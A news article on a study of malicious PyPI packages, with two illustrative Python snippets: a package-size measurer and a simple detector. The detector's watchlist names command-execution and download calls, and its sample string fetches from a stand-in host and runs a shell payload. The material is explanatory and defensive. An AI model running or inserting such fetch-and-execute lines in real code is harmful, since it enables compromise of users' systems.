The "cat and mouse game" making Python dangerous to code in
Python is a very versatile language by design, compatible with all manner of different programming languages and technologies. This is the source of its popularity, but it also makes the language more dangerous than you may realize.
A recent study from Nanyang Technological University in Singapore and Sichuan University in China has investigated the prevalence of malicious code in PyPI (the Python Package Index), the ecosystem containing many of the most popular packages for the programming language, such as NumPy and Pandas. It analyzed 1,556 malicious Python packages and 549 randomly chosen benign packages to assess how the former operated and what their goals were.
GitHub is part of the problem. The report said the scale of malicious Python code on PyPI is "relatively small" while "malicious projects on GitHub exhibit higher complexity." PyPI averaged 2 malicious files per package with a maximum depth of three layers; GitHub averaged 23 files and 17 layers.
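For readers who want a feel for those size figures, here is a minimal sketch of how a package's "shape" could be measured once it has been unpacked to disk. It assumes that "layers" means directory nesting, which may not match the study's exact definition, and it counts every Python file rather than only malicious ones. The function name package_shape and the demo file layout are hypothetical.

```python
import os
import tempfile


def package_shape(root):
    """Count .py files under root and the deepest directory level holding one.

    Depth 1 means the file sits directly in root (an assumed convention).
    """
    file_count = 0
    max_depth = 0
    root = os.path.abspath(root)
    for dirpath, _dirnames, filenames in os.walk(root):
        py_files = [f for f in filenames if f.endswith(".py")]
        if not py_files:
            continue
        rel = os.path.relpath(dirpath, root)
        # "." is the root itself; each path separator adds one more level.
        depth = 1 if rel == "." else rel.count(os.sep) + 2
        file_count += len(py_files)
        max_depth = max(max_depth, depth)
    return file_count, max_depth


# Build a tiny throwaway package layout to demonstrate the measurement.
with tempfile.TemporaryDirectory() as tmp:
    for rel_path in ("setup.py", "pkg/__init__.py", "pkg/sub/util.py"):
        full = os.path.join(tmp, *rel_path.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        open(full, "w").close()
    demo_shape = package_shape(tmp)
    print(demo_shape)  # (file count, maximum depth)
```

A small file count and shallow depth say nothing about safety on their own; as the study notes, the PyPI packages were small precisely because the heavy lifting happened elsewhere.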
This doesn't mean PyPI malware is any safer or less effective. For 43% of malicious packages, 90% or more of the code itself was malicious. The files are almost pure malware, using package name obfuscation to entice users to execute them. The packages are smaller, or contain fewer malicious files, because "the complex malicious behavior is stored in the payload and is downloaded during run-time."
This practice, command execution, was the most common technique among malicious PyPI packages, used by more than 59% of them. The next most common malicious behaviors were information stealing and file operations.
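As an illustration of how command execution and run-time downloads might be spotted before any code runs, here is a minimal sketch that parses a source file with Python's standard ast module and flags calls on a watchlist. The watchlist, the helper names and the sample snippet are all hypothetical and are not taken from the study; real detection tools are considerably more thorough.

```python
import ast

# Hypothetical watchlist of calls often associated with command execution
# or run-time downloads. This list is an assumption, not the study's.
SUSPICIOUS_CALLS = {
    "os.system",
    "os.popen",
    "subprocess.run",
    "subprocess.Popen",
    "subprocess.call",
    "subprocess.check_output",
    "urllib.request.urlopen",
    "urllib.request.urlretrieve",
    "eval",
    "exec",
}


def dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def find_suspicious_calls(source):
    """Parse source without running it and list (line, call name) hits."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name in SUSPICIOUS_CALLS:
                hits.append((node.lineno, name))
    return sorted(hits)


# Made-up snippet imitating the "download a payload, then run it" pattern.
sample = '''
import os, urllib.request
payload = urllib.request.urlopen("http://example.invalid/p").read()
os.system("sh payload.sh")
print("hello")
'''

for lineno, name in find_suspicious_calls(sample):
    print(f"line {lineno}: {name}")
```

A check like this is easy to evade: import aliases, `from os import system`, or encoded strings passed to other functions would all slip past it. That is the cat and mouse dynamic in miniature.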
Responding to the paper on Hacker News, Louis Lang, ex-NSA engineer and CTO of malware detection startup Phylum, said "this is likely to be a cat and mouse game for the foreseeable future." Although he is confident "detection will get better," the likelihood is that "attackers will change tactics."
What does that mean for Python in financial services? Almost all the major firms use Python in some way, shape or form, plus the most popular and standardized packages. However, they also have extensive cybersecurity teams with some of the most senior names in the business.
Nonetheless, developers who want to try out new packages would be best served by first trialing them in a secure sandboxed environment, such as one provided by WebAssembly.